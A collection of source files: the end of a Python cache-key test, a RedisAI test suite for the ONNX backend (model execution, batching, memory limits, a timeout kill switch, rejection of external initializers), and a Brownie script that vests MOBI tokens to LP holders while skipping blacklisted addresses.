_params_with_dataframe.clear_cache()
df_a = pd.DataFrame.from_dict(dict(a=[0], b=[2], c=[3]))
df_b = pd.DataFrame.from_dict(dict(a=[0], b=[2], c=[3]))
value_a = _params_with_dataframe(df_a, 1)
value_b = _params_with_dataframe(df_b, 1)
assert value_a == value_b # same content --> same key
value_a = _params_with_dataframe(1, df=df_a)
value_b = _params_with_dataframe(1, df=df_b)
assert value_a == value_b # same content --> same key
def test_cache_key():
"""Test that the calls some_func(1, ("a", 2)) and some_func(1, a=2)
are distinguished by the cache."""
@cachier()
def some_func(*args, **kwargs):
return len(kwargs) > 0
some_func(1, ("a", 2))
assert some_func(1, a=2)
|
tests_onnx.py
|
import shutil
import sys
import os
import subprocess
import redis
from includes import *
from RLTest import Env
'''
python -m RLTest --test tests_onnx.py --module path/to/redisai.so
'''
def test_onnx_modelrun_mnist(env):
if not TEST_ONNX:
env.debugPrint("skipping {} since TEST_ONNX=0".format(sys._getframe().f_code.co_name), force=True)
return
con = get_connection(env, '{1}')
model_pb = load_file_content('mnist.onnx')
wrong_model_pb = load_file_content('graph.pb')
sample_raw = load_file_content('one.raw')
ret = con.execute_command('AI.MODELSTORE', 'm{1}', 'ONNX', DEVICE, 'BLOB', model_pb)
env.assertEqual(ret, b'OK')
ensureSlaveSynced(con, env)
ret = con.execute_command('AI.MODELGET', 'm{1}', 'META')
env.assertEqual(len(ret), 16)
env.assertEqual(ret[5], b'')
env.assertEqual(len(ret[11]), 1)
env.assertEqual(len(ret[13]), 1)
ret = con.execute_command('AI.MODELSTORE', 'm{1}', 'ONNX', DEVICE, 'TAG', 'version:2', 'BLOB', model_pb)
env.assertEqual(ret, b'OK')
ensureSlaveSynced(con, env)
ret = con.execute_command('AI.MODELGET', 'm{1}', 'META')
env.assertEqual(len(ret), 16)
# TODO: enable me. CI is having issues on GPU asserts of ONNX and CPU
if DEVICE == "CPU":
env.assertEqual(ret[1], b'ONNX')
env.assertEqual(ret[3], b'CPU')
env.assertEqual(ret[5], b'version:2')
env.assertEqual(len(ret[11]), 1)
env.assertEqual(len(ret[13]), 1)
check_error_message(env, con, "No graph was found in the protobuf.",
'AI.MODELSTORE', 'm{1}', 'ONNX', DEVICE, 'BLOB', wrong_model_pb)
con.execute_command('AI.TENSORSET', 'a{1}', 'FLOAT', 1, 1, 28, 28, 'BLOB', sample_raw)
check_error_message(env, con, "Number of keys given as INPUTS here does not match model definition",
'AI.MODELEXECUTE', 'm{1}', 'INPUTS', 3, 'a{1}', 'b{1}', 'c{1}', 'OUTPUTS', 'c{1}')
con.execute_command('AI.MODELEXECUTE', 'm{1}', 'INPUTS', 1, 'a{1}', 'OUTPUTS', 1, 'b{1}')
ensureSlaveSynced(con, env)
values = con.execute_command('AI.TENSORGET', 'b{1}', 'VALUES')
argmax = max(range(len(values)), key=lambda i: values[i])
env.assertEqual(argmax, 1)
if env.useSlaves:
con2 = env.getSlaveConnection()
values2 = con2.execute_command('AI.TENSORGET', 'b{1}', 'VALUES')
env.assertEqual(values2, values)
def test_onnx_string_tensors(env):
if not TEST_ONNX:
env.debugPrint("skipping {} since TEST_ONNX=0".format(sys._getframe().f_code.co_name), force=True)
return
con = get_connection(env, '{1}')
model_pb = load_file_content('identity_string.onnx')
ret = con.execute_command('AI.MODELSTORE', 'm{1}', 'ONNX', DEVICE, 'BLOB', model_pb)
env.assertEqual(ret, b'OK')
# Execute onnx model whose input is string tensor with shape [2,2], that outputs the input
string_tensor_blob = b'input11\0input12\0input21\0input22\0'
con.execute_command('AI.TENSORSET', 'in_tensor{1}', 'STRING', 2, 2, 'BLOB', string_tensor_blob)
ret = con.execute_command('AI.MODELEXECUTE', 'm{1}', 'INPUTS', 1, 'in_tensor{1}', 'OUTPUTS', 1, 'out_tensor{1}')
env.assertEqual(ret, b'OK')
_, tensor_dtype, _, tensor_dim, _, tensor_values = con.execute_command('AI.TENSORGET', 'out_tensor{1}', 'META', 'VALUES')
env.assertEqual(tensor_dtype, b'STRING')
env.assertEqual(tensor_dim, [2, 2])
env.assertEqual(tensor_values, [b'input11', b'input12', b'input21', b'input22'])
if env.useSlaves:
ensureSlaveSynced(con, env)
slave_con = env.getSlaveConnection()
slave_tensor_values = slave_con.execute_command('AI.TENSORGET', 'out_tensor{1}', 'VALUES')
env.assertEqual(tensor_values, slave_tensor_values)
def test_onnx_string_tensors_batching(env):
if not TEST_ONNX:
env.debugPrint("skipping {} since TEST_ONNX=0".format(sys._getframe().f_code.co_name), force=True)
return
con = get_connection(env, '{1}')
model_pb = load_file_content('identity_string.onnx')
ret = con.execute_command('AI.MODELSTORE', 'm{1}', 'ONNX', DEVICE, 'BATCHSIZE', 2, 'MINBATCHSIZE', 2,
'BLOB', model_pb)
env.assertEqual(ret, b'OK')
con.execute_command('AI.TENSORSET', 'first_batch{1}', 'STRING', 1, 2, 'VALUES', 'this is\0', 'the first batch\0')
con.execute_command('AI.TENSORSET', 'second_batch{1}', 'STRING', 1, 2, 'VALUES', 'that is\0', 'the second batch\0')
def run():
con2 = get_connection(env, '{1}')
con2.execute_command('AI.MODELEXECUTE', 'm{1}', 'INPUTS', 1, 'first_batch{1}', 'OUTPUTS', 1, 'first_output{1}')
t = threading.Thread(target=run)
t.start()
con.execute_command('AI.MODELEXECUTE', 'm{1}', 'INPUTS', 1, 'second_batch{1}', 'OUTPUTS', 1, 'second_output{1}')
t.join()
out_values = con.execute_command('AI.TENSORGET', 'first_batch{1}', 'VALUES')
env.assertEqual(out_values, [b'this is', b'the first batch'])
out_values = con.execute_command('AI.TENSORGET', 'second_batch{1}', 'VALUES')
env.assertEqual(out_values, [b'that is', b'the second batch'])
def test_onnx_modelrun_batchdim_mismatch(env):
if not TEST_ONNX:
env.debugPrint("skipping {} since TEST_ONNX=0".format(sys._getframe().f_code.co_name), force=True)
return
con = get_connection(env, '{1}')
model_pb = load_file_content('batchdim_mismatch.onnx')
ret = con.execute_command('AI.MODELSTORE', 'm{1}', 'ONNX', DEVICE, 'BLOB', model_pb)
env.assertEqual(ret, b'OK')
ensureSlaveSynced(con, env)
con.execute_command('AI.TENSORSET', 'a{1}', 'FLOAT', 3, 'VALUES', 1, 1, 1)
con.execute_command('AI.TENSORSET', 'b{1}', 'FLOAT', 2, 'VALUES', 1, 1)
check_error_message(env, con, "Got invalid dimensions for input: 0 for the following indices index: 0 Got: 3"
" Expected: 2 Please fix either the inputs or the model.",
'AI.MODELEXECUTE', 'm{1}', 'INPUTS', 2, 'a{1}', 'b{1}', 'OUTPUTS', 2, 'c{1}', 'd{1}')
def test_onnx_modelrun_mnist_autobatch(env):
if not TEST_ONNX:
return
con = get_connection(env, '{1}')
model_pb = load_file_content('mnist_batched.onnx')
sample_raw = load_file_content('one.raw')
ret = con.execute_command('AI.MODELSTORE', 'm{1}', 'ONNX', 'CPU',
'BATCHSIZE', 2, 'MINBATCHSIZE', 2, 'BLOB', model_pb)
env.assertEqual(ret, b'OK')
ret = con.execute_command('AI.MODELGET', 'm{1}', 'META')
env.assertEqual(len(ret), 16)
# TODO: enable me. CI is having issues on GPU asserts of ONNX and CPU
if DEVICE == "CPU":
env.assertEqual(ret[1], b'ONNX')
env.assertEqual(ret[3], b'CPU')
env.assertEqual(ret[5], b'')
env.assertEqual(ret[7], 2)
env.assertEqual(ret[9], 2)
env.assertEqual(len(ret[11]), 1)
env.assertEqual(len(ret[13]), 1)
env.assertEqual(ret[15], 0)
con.execute_command('AI.TENSORSET', 'a{1}', 'FLOAT', 1, 1, 28, 28, 'BLOB', sample_raw)
con.execute_command('AI.TENSORSET', 'c{1}', 'FLOAT', 1, 1, 28, 28, 'BLOB', sample_raw)
ensureSlaveSynced(con, env)
def run():
con = get_connection(env, '{1}')
con.execute_command('AI.MODELEXECUTE', 'm{1}', 'INPUTS', 1, 'c{1}', 'OUTPUTS', 1, 'd{1}')
t = threading.Thread(target=run)
t.start()
con.execute_command('AI.MODELEXECUTE', 'm{1}', 'INPUTS', 1, 'a{1}', 'OUTPUTS', 1, 'b{1}')
t.join()
ensureSlaveSynced(con, env)
import time
time.sleep(1)
values = con.execute_command('AI.TENSORGET', 'b{1}', 'VALUES')
argmax = max(range(len(values)), key=lambda i: values[i])
env.assertEqual(argmax, 1)
values = con.execute_command('AI.TENSORGET', 'd{1}', 'VALUES')
argmax = max(range(len(values)), key=lambda i: values[i])
env.assertEqual(argmax, 1)
def test_onnx_modelrun_iris(env):
if not TEST_ONNX:
env.debugPrint("skipping {} since TEST_ONNX=0".format(sys._getframe().f_code.co_name), force=True)
return
con = get_connection(env, '{1}')
linear_model = load_file_content('linear_iris.onnx')
logreg_model = load_file_content('logreg_iris.onnx')
ret = con.execute_command('AI.MODELSTORE', 'linear{1}', 'ONNX', DEVICE, 'BLOB', linear_model)
env.assertEqual(ret, b'OK')
ret = con.execute_command('AI.MODELSTORE', 'logreg{1}', 'ONNX', DEVICE, 'BLOB', logreg_model)
env.assertEqual(ret, b'OK')
con.execute_command('AI.TENSORSET', 'features{1}', 'FLOAT', 1, 4, 'VALUES', 5.1, 3.5, 1.4, 0.2)
ensureSlaveSynced(con, env)
con.execute_command('AI.MODELEXECUTE', 'linear{1}', 'INPUTS', 1, 'features{1}', 'OUTPUTS', 1, 'linear_out{1}')
con.execute_command('AI.MODELEXECUTE', 'logreg{1}', 'INPUTS', 1, 'features{1}', 'OUTPUTS', 2, 'logreg_out{1}', 'logreg_probs{1}')
ensureSlaveSynced(con, env)
linear_out = con.execute_command('AI.TENSORGET', 'linear_out{1}', 'VALUES')
logreg_out = con.execute_command('AI.TENSORGET', 'logreg_out{1}', 'VALUES')
env.assertEqual(float(linear_out[0]), -0.090524077415466309)
env.assertEqual(logreg_out[0], 0)
if env.useSlaves:
con2 = env.getSlaveConnection()
linear_out2 = con2.execute_command('AI.TENSORGET', 'linear_out{1}', 'VALUES')
logreg_out2 = con2.execute_command('AI.TENSORGET', 'logreg_out{1}', 'VALUES')
env.assertEqual(linear_out, linear_out2)
env.assertEqual(logreg_out, logreg_out2)
def test_onnx_modelinfo(env):
if not TEST_ONNX:
env.debugPrint("skipping {} since TEST_ONNX=0".format(sys._getframe().f_code.co_name), force=True)
return
con = get_connection(env, '{1}')
linear_model = load_file_content('linear_iris.onnx')
ret = con.execute_command('AI.MODELSTORE', 'linear{1}', 'ONNX', DEVICE, 'BLOB', linear_model)
env.assertEqual(ret, b'OK')
model_serialized_master = con.execute_command('AI.MODELGET', 'linear{1}', 'META')
con.execute_command('AI.TENSORSET', 'features{1}', 'FLOAT', 1, 4, 'VALUES', 5.1, 3.5, 1.4, 0.2)
ensureSlaveSynced(con, env)
if env.useSlaves:
con2 = env.getSlaveConnection()
model_serialized_slave = con2.execute_command('AI.MODELGET', 'linear{1}', 'META')
env.assertEqual(len(model_serialized_master), len(model_serialized_slave))
previous_duration = 0
for call in range(1, 10):
res = con.execute_command('AI.MODELEXECUTE', 'linear{1}', 'INPUTS', 1, 'features{1}', 'OUTPUTS', 1, 'linear_out{1}')
env.assertEqual(res, b'OK')
ensureSlaveSynced(con, env)
info = con.execute_command('AI.INFO', 'linear{1}')
info_dict_0 = info_to_dict(info)
env.assertEqual(info_dict_0['key'], 'linear{1}')
env.assertEqual(info_dict_0['type'], 'MODEL')
env.assertEqual(info_dict_0['backend'], 'ONNX')
env.assertEqual(info_dict_0['device'], DEVICE)
env.assertTrue(info_dict_0['duration'] > previous_duration)
env.assertEqual(info_dict_0['samples'], call)
env.assertEqual(info_dict_0['calls'], call)
env.assertEqual(info_dict_0['errors'], 0)
previous_duration = info_dict_0['duration']
res = con.execute_command('AI.INFO', 'linear{1}', 'RESETSTAT')
env.assertEqual(res, b'OK')
info = con.execute_command('AI.INFO', 'linear{1}')
info_dict_0 = info_to_dict(info)
env.assertEqual(info_dict_0['duration'], 0)
env.assertEqual(info_dict_0['samples'], 0)
env.assertEqual(info_dict_0['calls'], 0)
env.assertEqual(info_dict_0['errors'], 0)
def test_onnx_modelrun_disconnect(env):
if not TEST_ONNX:
env.debugPrint("skipping {} since TEST_ONNX=0".format(sys._getframe().f_code.co_name), force=True)
return
con = get_connection(env, '{1}')
linear_model = load_file_content('linear_iris.onnx')
ret = con.execute_command('AI.MODELSTORE', 'linear{1}', 'ONNX', DEVICE, 'BLOB', linear_model)
env.assertEqual(ret, b'OK')
model_serialized_master = con.execute_command('AI.MODELGET', 'linear{1}', 'META')
con.execute_command('AI.TENSORSET', 'features{1}', 'FLOAT', 1, 4, 'VALUES', 5.1, 3.5, 1.4, 0.2)
ensureSlaveSynced(con, env)
if env.useSlaves:
con2 = env.getSlaveConnection()
model_serialized_slave = con2.execute_command('AI.MODELGET', 'linear{1}', 'META')
env.assertEqual(len(model_serialized_master), len(model_serialized_slave))
ret = send_and_disconnect(('AI.MODELEXECUTE', 'linear{1}', 'INPUTS', 1, 'features{1}', 'OUTPUTS', 1, 'linear_out{1}'), con)
env.assertEqual(ret, None)
def tests_onnx_info(env):
if not TEST_ONNX:
env.debugPrint("skipping {} since TEST_ONNX=0".format(sys._getframe().f_code.co_name), force=True)
return
con = get_connection(env, '{1}')
backends_info = get_info_section(con, 'backends_info')
env.assertFalse('ai_onnxruntime_version' in backends_info)
linear_model = load_file_content('linear_iris.onnx')
con.execute_command('AI.MODELSTORE', 'linear{1}', 'ONNX', DEVICE, 'BLOB', linear_model)
backends_info = get_info_section(con, 'backends_info')
env.assertTrue('ai_onnxruntime_version' in backends_info)
def test_parallelism():
env = Env(moduleArgs='INTRA_OP_PARALLELISM 1 INTER_OP_PARALLELISM 1')
if not TEST_ONNX:
env.debugPrint("skipping {} since TEST_ONNX=0".format(sys._getframe().f_code.co_name), force=True)
return
con = get_connection(env, '{1}')
model_pb = load_file_content('mnist.onnx')
sample_raw = load_file_content('one.raw')
ret = con.execute_command('AI.MODELSTORE', 'm{1}', 'ONNX', DEVICE, 'BLOB', model_pb)
env.assertEqual(ret, b'OK')
con.execute_command('AI.TENSORSET', 'a{1}', 'FLOAT', 1, 1, 28, 28, 'BLOB', sample_raw)
con.execute_command('AI.MODELEXECUTE', 'm{1}', 'INPUTS', 1, 'a{1}', 'OUTPUTS', 1, 'b{1}')
ensureSlaveSynced(con, env)
values = con.execute_command('AI.TENSORGET', 'b{1}', 'VALUES')
argmax = max(range(len(values)), key=lambda i: values[i])
env.assertEqual(argmax, 1)
load_time_config = get_info_section(con, 'load_time_configs')
env.assertEqual(load_time_config["ai_inter_op_parallelism"], "1")
env.assertEqual(load_time_config["ai_intra_op_parallelism"], "1")
env = Env(moduleArgs='INTRA_OP_PARALLELISM 2 INTER_OP_PARALLELISM 2')
load_time_config = get_info_section(con, 'load_time_configs')
env.assertEqual(load_time_config["ai_inter_op_parallelism"], "2")
env.assertEqual(load_time_config["ai_intra_op_parallelism"], "2")
class TestOnnxCustomAllocator:
def __init__(self):
self.env = Env()
if not TEST_ONNX:
self.env.debugPrint("skipping {} since TEST_ONNX=0".format(sys._getframe().f_code.co_name), force=True)
return
self.allocator_access_counter = 0
def test_1_cpu_allocator(self):
con = get_connection(self.env, '{1}')
model_pb = load_file_content('mul_1.onnx')
# Expect using the allocator during model set for allocating the model, its input name and output name:
# overall 3 allocations. The model raw size is 24B ,and the names are 2B each. In practice we allocate
# more than 28B as Redis allocator will use additional memory for its internal management and for the
# 64-Byte alignment. When the test runs with valgrind, redis will use malloc for the allocations
# (hence will not use additional memory).
ret = con.execute_command('AI.MODELSTORE', 'm{1}', 'ONNX', 'CPU', 'BLOB', model_pb)
self.env.assertEqual(ret, b'OK')
self.allocator_access_counter += 3
backends_info = get_info_section(con, 'backends_info')
# Expect using at least 24+63+(size of an address) + 2*(2+63+(size of an address)) (=241) bytes.
model_allocation_bytes_used = int(backends_info["ai_onnxruntime_memory"])
self.env.assertTrue(model_allocation_bytes_used >= 241)
self.env.assertEqual(int(backends_info["ai_onnxruntime_memory_access_num"]), self.allocator_access_counter)
con.execute_command('AI.TENSORSET', 'a_mul{1}', 'FLOAT', 3, 2, 'VALUES', 1.0, 2.0, 3.0, 4.0, 5.0, 6.0)
# Running the model should access the allocator 6 times: allocating+freeing input+output names,
# and allocating+freeing the output as OrtValue. Overall, there should be no change in the memory consumption.
con.execute_command('AI.MODELEXECUTE', 'm{1}', 'INPUTS', 1, 'a_mul{1}', 'OUTPUTS', 1, 'b{1}')
self.allocator_access_counter += 6
values = con.execute_command('AI.TENSORGET', 'b{1}', 'VALUES')
self.env.assertEqual(values, [b'1', b'4', b'9', b'16', b'25', b'36'])
backends_info = get_info_section(con, 'backends_info')
self.env.assertEqual(int(backends_info["ai_onnxruntime_memory_access_num"]), self.allocator_access_counter)
self.env.assertEqual(int(backends_info["ai_onnxruntime_memory"]), model_allocation_bytes_used)
# Expect using the allocator free function 3 times: when releasing the model, input name and output name.
con.execute_command('AI.MODELDEL', 'm{1}')
self.allocator_access_counter += 3
self.env.assertFalse(con.execute_command('EXISTS', 'm{1}'))
backends_info = get_info_section(con, 'backends_info')
self.env.assertEqual(int(backends_info["ai_onnxruntime_memory"]), 0)
self.env.assertEqual(int(backends_info["ai_onnxruntime_memory_access_num"]), self.allocator_access_counter)
def test_2_with_gpu(self):
if DEVICE == 'CPU':
self.env.debugPrint("skipping {} since this test if for GPU only".format(sys._getframe().f_code.co_name), force=True)
return
con = get_connection(self.env, '{1}')
model_pb = load_file_content('mul_1.onnx')
# for GPU, expect using the allocator only for allocating input and output names (not the model itself).
ret = con.execute_command('AI.MODELSTORE', 'm_gpu{1}', 'ONNX', DEVICE, 'BLOB', model_pb)
self.env.assertEqual(ret, b'OK')
self.allocator_access_counter += 2
# Expect using at least 2*(2+63+(size of an address))(=146) bytes by redis allocator, but no more than 240,
# as the model weights shouldn't be allocated by the allocator.
backends_info = get_info_section(con, 'backends_info')
model_allocation_bytes_used = int(backends_info["ai_onnxruntime_memory"])
self.env.assertTrue(model_allocation_bytes_used > 146)
self.env.assertTrue(model_allocation_bytes_used < 241)
self.env.assertEqual(int(backends_info["ai_onnxruntime_memory_access_num"]), self.allocator_access_counter)
# Make sure that allocator is not used for running and freeing the GPU model, except for
# the input and output names allocations (and deallocations).
con.execute_command('AI.TENSORSET', 'a{1}', 'FLOAT', 3, 2, 'VALUES', 1.0, 2.0, 3.0, 4.0, 5.0, 6.0)
con.execute_command('AI.MODELEXECUTE', 'm_gpu{1}', 'INPUTS', 1, 'a{1}', 'OUTPUTS', 1, 'b{1}')
self.allocator_access_counter += 4
values = con.execute_command('AI.TENSORGET', 'b{1}', 'VALUES')
self.env.assertEqual(values, [b'1', b'4', b'9', b'16', b'25', b'36'])
# Expect that memory usage didn't change, and for another 4 accesses to the allocator (input and output names
# allocation and free)
backends_info = get_info_section(con, 'backends_info')
self.env.assertEqual(int(backends_info["ai_onnxruntime_memory"]), model_allocation_bytes_used)
self.env.assertEqual(int(backends_info["ai_onnxruntime_memory_access_num"]), self.allocator_access_counter)
# Expect only 2 more accesses in delete - for deallocating input and output names
con.execute_command('AI.MODELDEL', 'm_gpu{1}')
self.allocator_access_counter += 2
self.env.assertFalse(con.execute_command('EXISTS', 'm_gpu{1}'))
backends_info = get_info_section(con, 'backends_info')
self.env.assertEqual(int(backends_info["ai_onnxruntime_memory"]), 0)
self.env.assertEqual(int(backends_info["ai_onnxruntime_memory_access_num"]), self.allocator_access_counter)
def test_3_memory_limit(self):
self.env = Env(moduleArgs='THREADS_PER_QUEUE 8 BACKEND_MEMORY_LIMIT 1')
self.allocator_access_counter = 0
con = get_connection(self.env, '{1}')
# Try to allocate a model whose size exceeds the memory limit
inception_pb = load_file_content('inception-v2-9.onnx')
check_error_message(self.env, con, "Exception during initialization: Onnxruntime memory limit exceeded,"
" memory allocation failed.",
'AI.MODELSTORE', 'inception{1}', 'ONNX', 'CPU', 'BLOB', inception_pb)
mnist_pb = load_file_content('mnist.onnx')
sample_raw = load_file_content('one.raw')
# Create 25 different sessions of mnist model, the size of each session in onnx is ~31KB, overall ~770KB
for i in range(25):
ret = con.execute_command('AI.MODELSTORE', 'mnist_'+str(i)+'{1}', 'ONNX', 'CPU', 'BLOB', mnist_pb)
self.env.assertEqual(ret, b'OK')
con.execute_command('AI.TENSORSET', 'a{1}', 'FLOAT', 1, 1, 28, 28, 'BLOB', sample_raw)
# As onnx memory consumption is about 0.77MB at this point, and executing mnist session requires an additional
# 500KB of memory, we are expected to exceed the memory limit here in some operation. Note that the exact
# memory consumption here changes whether we are using libc allocator or jemalloc (jemalloc will be greater)
check_error_message(self.env, con, "Onnxruntime memory limit exceeded, memory allocation failed.",
'AI.MODELEXECUTE', 'mnist_0{1}', 'INPUTS', 1, 'a{1}', 'OUTPUTS', 1, 'b{1}',
error_msg_is_substr=True)
def run_parallel_onnx_sessions(con):
check_error_message(self.env, con, "Onnxruntime memory limit exceeded, memory allocation failed.",
'AI.MODELEXECUTE', 'mnist_0{1}', 'INPUTS', 1, 'a{1}', 'OUTPUTS', 1, 'b{1}',
error_msg_is_substr=True)
# We run sessions in parallel, all of them should fail. Note that here.
run_test_multiproc(self.env, '{1}', 50, run_parallel_onnx_sessions)
class TestOnnxKillSwitch:
def __init__(self):
self.threads_per_queue = 8
self.env = Env(moduleArgs='THREADS_PER_QUEUE '+str(self.threads_per_queue)+' MODEL_EXECUTION_TIMEOUT 1000')
con = get_connection(self.env, '{1}')
model_with_inf_loop = load_file_content("model_with_infinite_loop.onnx")
ret = con.execute_command('AI.MODELSTORE', 'inf_loop_model{1}', 'ONNX', DEVICE, 'BLOB', model_with_inf_loop)
self.env.assertEqual(ret, b'OK')
# Set tensors according to the model inputs. This model consists of two operations to type 'Identity'
# (i.e., just output the input), where the second op is wrapped with another op of type 'Loop'. Overall, this
# model runs a very large number of iterations without doing anything, until it is caught with the kill switch.
con.execute_command('AI.TENSORSET', 'iterations{1}', 'INT64', 1, 'VALUES', 9223372036854775807)
con.execute_command('AI.TENSORSET', 'loop_cond{1}', 'BOOL', 1, 'VALUES', 1)
con.execute_command('AI.TENSORSET', 'loop_input{1}', 'FLOAT', 1, 'VALUES', 42)
con.execute_command('AI.TENSORSET', 'outer_scope_input{1}', 'FLOAT', 1, 'VALUES', 42)
def test_basic(self):
con = get_connection(self.env, '{1}')
check_error_message(self.env, con, "Exiting due to terminate flag being set to true",
'AI.MODELEXECUTE', 'inf_loop_model{1}', 'INPUTS', 4, 'outer_scope_input{1}', 'iterations{1}',
'loop_cond{1}', 'loop_input{1}', 'OUTPUTS', 2, 'outer_scope_output{1}', 'loop_output{1}',
error_msg_is_substr=True)
def test_multiple_working_threads(self):
con = get_connection(self.env, '{1}')
# Load another onnx model that will be executed on the same threads that use the kill switch
model_pb = load_file_content('mnist.onnx')
sample_raw = load_file_content('one.raw')
ret = con.execute_command('AI.MODELSTORE', 'mnist{1}', 'ONNX', DEVICE, 'BLOB', model_pb)
self.env.assertEqual(ret, b'OK')
con.execute_command('AI.TENSORSET', 'a{1}', 'FLOAT', 1, 1, 28, 28, 'BLOB', sample_raw)
def run_parallel_onnx_sessions(con):
ret = con.execute_command('AI.MODELEXECUTE', 'mnist{1}', 'INPUTS', 1, 'a{1}', 'OUTPUTS', 1, 'b{1}')
self.env.assertEqual(ret, b'OK')
check_error_message(self.env, con, "Exiting due to terminate flag being set to true",
'AI.MODELEXECUTE', 'inf_loop_model{1}', 'INPUTS', 4, 'outer_scope_input{1}', 'iterations{1}',
'loop_cond{1}', 'loop_input{1}', 'OUTPUTS', 2, 'outer_scope_output{1}', 'loop_output{1}',
error_msg_is_substr=True)
ret = con.execute_command('AI.MODELEXECUTE', 'mnist{1}', 'INPUTS', 1, 'a{1}', 'OUTPUTS', 1, 'b{1}')
self.env.assertEqual(ret, b'OK')
run_test_multiproc(self.env, '{1}', 8, run_parallel_onnx_sessions)
def test_multiple_devices(self):
con = get_connection(self.env, '{1}')
# CPU run queue is created from the start, so if we used a device different than CPU, we should
# have maximum of 2*THREADS_PER_QUEUE run sessions, and otherwise we should have THREADS_PER_QUEUE.
devices = {'CPU', DEVICE}
backends_info = get_info_section(con, 'backends_info')
self.env.assertEqual(backends_info['ai_onnxruntime_maximum_run_sessions_number'],
str(len(devices)*self.threads_per_queue))
# Load another onnx model as if it runs on a different device (to test existence of multiple queues, and
# the extension of the global onnx run sessions array as a consequence.)
model_pb = load_file_content('mnist.onnx')
ret = con.execute_command('AI.MODELSTORE', 'mnist_{1}', 'ONNX', 'CPU:1', 'BLOB', model_pb)
self.env.assertEqual(ret, b'OK')
devices.add('CPU:1')
backends_info = get_info_section(con, 'backends_info')
self.env.assertEqual(backends_info['ai_onnxruntime_maximum_run_sessions_number'],
str(len(devices)*self.threads_per_queue))
def test_forbidden_external_initializers(env):
if not TEST_ONNX:
env.debugPrint("skipping {} since TEST_ONNX=0".format(sys._getframe().f_code.co_name), force=True)
return
con = get_connection(env, '{1}')
# move the external initializer to the redis' current dir (tests/flow/logs)
external_initializer_model = load_file_content("model_with_external_initializers.onnx")
shutil.copy(ROOT+"/tests/flow/test_data/Pads.bin", ROOT+"/tests/flow/logs")
check_error_message(env, con, "Initializer tensors with external data is not allowed.",
'AI.MODELSTORE', 'ext_initializers_model{1}', 'ONNX', DEVICE,
'BLOB', external_initializer_model)
os.remove(ROOT+"/tests/flow/logs/Pads.bin")
|
vest_lp_tokens.py
|
import json
import threading
from decimal import Decimal
from brownie import ERC20MOBI, VestingEscrow, accounts, history, network
from . import deployment_config as config
network.gas_limit(8000000)
TOTAL_AMOUNT = 5_000_000 * 10 ** 18
VESTING_PERIOD = 86400 * 7
# burn addresses / known scammers
BLACKLIST = [
"0x000000000000000000000000000000000000dead",
"0xe857656b7804ecc0d0d0fd643c6cfb69063a7d1a",
"0xbce6d09b800d0bc03f34ef93ed356519faec64d0",
"0xe4ffd96b5e6d2b6cdb91030c48cc932756c951b5",
]
def live():
"""
Vest tokens in a live environment.
* Apply web3 gas price strategy and middlewares
* Run main deployment and distribution logic
"""
admin, funding_admins = config.get_live_admin()
with open(config.DEPLOYMENTS_JSON) as fp:
deployments = json.load(fp)
vest_tokens(admin, funding_admins, deployments["ERC20MOBI"], config.REQUIRED_CONFIRMATIONS)
def development():
"""
Vest tokens in a development environment.
* Deploy the DAO token
* Run the main deployment and distribution logic
* Perform a sanity check to confirm balances and total supply are as expected
"""
token = ERC20MOBI.deploy("Mobius DAO Token", "MOBI", 18, {"from": accounts[0]})
vesting_escrow, vested_amounts = vest_tokens(accounts[0], accounts[1:5], token, 1)
sanity_check(vesting_escrow, vested_amounts)
logging_lock = threading.Lock()
logger_data = []
def _log_tx(**kwargs):
with logging_lock:
logger_data.append(kwargs)
with open("vesting-lp-log.json", "w") as fp:
json.dump(logger_data, fp)
def _fund_accounts(acct, vesting_escrow, fund_arguments, confs):
# called with 5 threads to fund recipients more efficiently
while fund_arguments:
try:
recipients, amounts = fund_arguments.pop()
except IndexError:
break
tx = vesting_escrow.fund(recipients, amounts, {"from": acct, "required_confs": 0})
_log_tx(
txid=tx.txid,
fn_name=tx.fn_name,
recipients=recipients,
amounts=amounts,
sender=acct.address,
)
tx.wait(confs)
def vest_tokens(admin, funding_admins, token_address, confs):
start_idx = len(history)
# get token Contract object
token = ERC20MOBI.at(token_address)
# deploy vesting contract
start_time = 1632004200 #1631916000 #1631883600 # token.future_epoch_time_write.call()
vesting_escrow = VestingEscrow.deploy(
token,
start_time,
start_time + VESTING_PERIOD,
False,
funding_admins,
{"from": admin, "required_confs": confs},
)
_log_tx(
txid=vesting_escrow.tx.txid,
fn_name="VestingEscrow.deploy",
contract_address=vesting_escrow.address,
)
# load vesting data from json
with open(config.LP_VESTING_JSON) as fp:
vested_pct = {k.lower(): Decimal(v) for k, v in json.load(fp).items()}
for addr in BLACKLIST:
if addr.lower() in vested_pct:
del vested_pct[addr]
# calculate absolute amounts to be distributed
initial_total = sum(int(v * TOTAL_AMOUNT) for v in vested_pct.values())
adjustment_pct = Decimal(TOTAL_AMOUNT) / initial_total
vested_amounts = sorted(
([k, int(v * TOTAL_AMOUNT * adjustment_pct)] for k, v in vested_pct.items()),
key=lambda k: k[1],
reverse=True,
)
if vested_amounts[-1][1] < 0:
raise ValueError(f"'{config.LP_VESTING_JSON}' contains negative amounts!")
vested_amounts = [i for i in vested_amounts if i[1]]
# floats -> int, we expect to be ever so slightly over, so lets fix that
final_total = sum(i[1] for i in vested_amounts)
if not 0 <= abs(final_total - TOTAL_AMOUNT) < len(vested_amounts):
print(final_total)
print(TOTAL_AMOUNT)
raise ValueError("Imprecision!!! Distribution amounts are too far off!")
for i in range(abs(final_total - TOTAL_AMOUNT)):
if final_total < TOTAL_AMOUNT:
vested_amounts[i][1] += 1
else:
vested_amounts[i][1] -= 1
tx = token.approve(vesting_escrow, TOTAL_AMOUNT, {"from": admin, "required_confs": confs})
_log_tx(txid=tx.txid, fn_name=tx.fn_name, spender=vesting_escrow.address, amount=TOTAL_AMOUNT)
tx = vesting_escrow.add_tokens(TOTAL_AMOUNT, {"from": admin, "required_confs": confs})
_log_tx(txid=tx.txid, fn_name=tx.fn_name, amount=TOTAL_AMOUNT)
# convert vested_amounts into input args for `VestingEscrow.fund` calls
fund_arguments = [
([x[0] for x in vested_amounts[i : i + 100]], [x[1] for x in vested_amounts[i : i + 100]])
for i in range(0, len(vested_amounts), 100)
]
# final call needs to be extended with zero values
zeros = 100 - len(fund_arguments[-1][0])
fund_arguments[-1] = (
fund_arguments[-1][0] + ["0x0000000000000000000000000000000000000000"] * zeros,
fund_arguments[-1][1] + [0] * zeros,
)
# use threading to handle the funding across several accounts
funding_threads = []
for acct in [admin] + funding_admins:
thread = threading.Thread(
target=_fund_accounts, args=(acct, vesting_escrow, fund_arguments, confs)
)
funding_threads.append(thread)
thread.start()
for thread in funding_threads:
thread.join()
